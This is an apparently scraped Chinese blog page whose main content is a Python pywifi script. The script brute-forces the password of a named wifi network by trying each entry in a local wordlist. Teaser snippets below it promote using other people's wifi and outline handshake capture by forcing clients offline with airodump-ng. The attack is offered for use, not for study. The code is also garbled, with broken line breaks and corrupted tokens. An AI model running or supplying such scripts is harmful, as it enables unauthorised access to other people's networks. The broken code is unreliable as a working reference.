Python破解wifi密碼

2021-10-08 10:06:47 字數 2114 閱讀 1827

提取碼:phbe

import time  # 時間

import pywifi # 破解wifi

# 密碼本路徑

path = r"c:\users\administrator\desktop\passwd.txt"

# wifi名稱

wifi_name =

'yyy-jinan'

# 獲取文字內容

file =

open

(path,

"r", errors=

"ignore"

)

wifi = pywifi.

pywifi

() # 抓取網絡卡介面

iface = wifi.

inte***ces()

[0] # 抓取第乙個無限網絡卡

def isno()

: iface.

disconnect

() # 測試鏈結斷開所有鏈結

# 測試網絡卡是否屬於斷開狀態,

iface.

status

() in \

[0,2]

def test_connect

(findstr)

: # 測試鏈結

profile = pywifi.

profile

() # 建立wifi鏈結檔案

profile.ssid = wifi_name # wifi名稱

profile.auth =

0 # 網絡卡的開放,

profile.akm.(4

) # wifi加密演算法

profile.cipher =

3 # 加密單元

profile.key = findstr # 密碼

iface.

remove_all_network_profiles

() # 刪除所有的wifi檔案

tmp_profile = iface.

add_network_profile

(profile) # 設定新的鏈結檔案

iface.

connect

(tmp_profile) # 鏈結

time.

sleep(1

)if iface.

status()

==4: # 判斷是否連線上

isok = true

else

: isok = false

iface.

disconnect

() # 斷開

time.

sleep(1

) # 檢查斷開狀態

assert iface.

status

() in \

[0,2]

return isok

def readpassword()

:print

("開始破解:"

)while true:

try:

mystr = file.

readline()

if not mystr:

break

bool1 =

test_connect

(mystr)

if bool1:

print

("密碼正確:"

, mystr)

break

else

:print

("密碼錯誤:"

+ mystr)

except:

continue

isno()

readpassword

()

提取碼:q9vs

這件事更像是贏得彩票,如果輸了就只能看臉。

Python 破解 wifi 密碼

想蹭網?不知道wifi密碼?教你如何破解wifi密碼連上wifi 安裝pywifi庫 因為我已經安裝好了,這裡就不展示安裝成功的資訊了 這裡有點注意的地方是有些人命名安裝了pywifi,import pywifi執行的時候卻報錯,我也試過這樣 這裡只需要再安裝乙個comtypes庫就行了,只有三百k...

wifi密碼破解

iwconfig檢視網絡卡 啟動監聽模式,設定通道 airodump ng wlan0掃瞄周邊熱點 找疾風劍豪這個 得到mac位址 2e 15 e1 28 56 08 準備抓握手包 需要有人連上了目標wifi,把他踢下線,在他重新連線的時候進行抓包操作 airodump ng c 3 bssid 2...

kali破解WIFI密碼

今天我們來學習一下通過kali和乙個好的字典來破解wifi密碼。宣告 此教程僅供學習研究使用,嚴禁使用此技術進行非法行為 首先我們需要乙個具有監聽功能的無線網絡卡 這裡我給大家推薦 rt3070 本章實驗通過虛擬機器vmware進行 先通過services.msc來開啟vmware usb arbi...